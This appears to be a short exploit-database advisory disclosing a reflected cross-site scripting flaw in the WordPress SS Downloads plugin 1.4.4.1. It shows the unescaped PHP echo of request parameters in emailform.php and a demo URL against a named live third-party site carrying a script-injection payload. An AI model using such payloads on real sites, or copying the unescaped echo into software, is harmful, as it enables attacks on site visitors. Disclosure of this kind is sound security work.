######################
# Exploit Title : Wordpress SS Downloads Plugin Cross Site Scripting

# Exploit Author : ACC3SS

# Vendor Homepage : http://wordpress.org/plugins/ss-downloads/developers/

# Software Link :
http://downloads.wordpress.org/plugin/ss-downloads.1.4.4.1.zip

# Date : 2014-01-19

# Tested on : Windows 7 / Mozilla Firefox Web Browser

# Discovered by : ACC3SS

######################

# Vulnerability code : emailform.php

$file = $_REQUEST['file']; & <?php echo $file; ?>
$title = $_REQUEST['title']; & <?php echo $title; ?>
$postid = $_REQUEST['postid']; & <?php echo $postid; ?>

######################

# Location :
localhost/wp-content/plugins/ss-downloads/templates/emailform.php?file=[Xss]

######################
# Demo :

#
http://aquarts.de/wp-content/plugins/ss-downloads/templates/emailform.php?file=
"/><script>alert(1);</script>
######################